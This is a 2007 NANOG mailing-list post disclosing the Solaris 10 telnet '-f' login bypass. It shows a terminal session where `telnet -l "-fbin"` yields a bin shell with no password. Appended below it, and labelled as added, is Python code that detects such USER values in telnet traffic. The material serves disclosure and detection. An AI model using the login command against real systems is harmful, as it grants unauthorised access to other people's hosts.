[94844] in North American Network Operators' Group
Solaris 10 Telnet Exploit
daemon@ATHENA.MIT.EDU (William Schultz)
Sun Feb 11 22:39:38 2007
To: nanog@merit.edu
From: William Schultz <wschultz@bsdboy.com>
Date: Sun, 11 Feb 2007 19:30:27 -0800
Errors-To: owner-nanog@merit.edu
http://erratasec.blogspot.com/2007/02/trivial-remote-solaris-0day-disable.html
Tested on Sol10, and it indeed works... Good thing we use SSH, right?!
################################
iWil:~ wschultz$ telnet -l "-fbin" dns1
Trying A.B.C.D...
Connected to dns1.my.com.
Escape character is '^]'.
Last login: Sun Feb 11 18:11:05 from A.B.C.D
Sun Microsystems Inc. SunOS 5.10 Generic January 2005
$ id
uid=2(bin) gid=2(bin)
$
################################
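
Added example, not part of the original post: a detection sketch for the login name shown in the session above. It relies on a fact the post does not state, that `telnet -l` sends the name as the `USER` variable in a NEW-ENVIRON subnegotiation (RFC 1572), and it flags any `USER` value beginning with `-`. The function names and the sample bytes are constructed for illustration, and the older ENVIRON option is not covered.

```python
import re

# Telnet command bytes (RFC 854) and NEW-ENVIRON codes (RFC 1572).
IAC, SB, SE, WILL, NEW_ENVIRON = 255, 250, 240, 251, 39
IS, INFO, VAR, VALUE, ESC, USERVAR = 0, 2, 0, 1, 2, 3

# Consume IAC IAC and IAC WILL/WONT/DO/DONT <opt> first so escaped data is never read as SB.
TOKEN = re.compile(
    rb"\xff\xff|\xff[\xfb-\xfe].|\xff\xfa(.)((?:[^\xff]|\xff\xff)*)\xff\xf0", re.S)

def subnegotiations(stream):
    """Yield (option, payload) for each complete IAC SB ... IAC SE block."""
    for m in TOKEN.finditer(stream):
        if m.group(1) is not None:
            yield m.group(1)[0], m.group(2).replace(b"\xff\xff", b"\xff")

def environ_vars(payload):
    """Decode an IS/INFO payload into {name: value}, honouring ESC."""
    env, fields, i = {}, [], 1
    if not payload or payload[0] not in (IS, INFO):
        return env
    while i < len(payload):
        b = payload[i]
        if b in (VAR, VALUE, USERVAR):
            fields.append([b, bytearray()])      # start a new name or value field
        elif fields:
            if b == ESC and i + 1 < len(payload):
                i += 1                           # next byte is literal data
            fields[-1][1].append(payload[i])
        i += 1
    name = None
    for kind, data in fields:
        if kind != VALUE:
            name = data.decode("latin-1")
            env[name] = ""
        elif name is not None:
            env[name] = data.decode("latin-1")
    return env

def suspicious_users(stream):
    """Return USER values that begin with '-' in client-to-server bytes."""
    return [u for opt, p in subnegotiations(stream) if opt == NEW_ENVIRON
            for u in [environ_vars(p).get("USER", "")] if u.startswith("-")]

# Constructed client bytes: IAC WILL NEW-ENVIRON, then IS VAR "USER" VALUE <name>.
def sample(name):
    return (bytes([IAC, WILL, NEW_ENVIRON, IAC, SB, NEW_ENVIRON, IS, VAR])
            + b"USER" + bytes([VALUE]) + name + bytes([IAC, SE]))
```

Feed it the reassembled client-to-server side of a TCP/23 session; `suspicious_users(sample(b"-fbin"))` returns the flagged name.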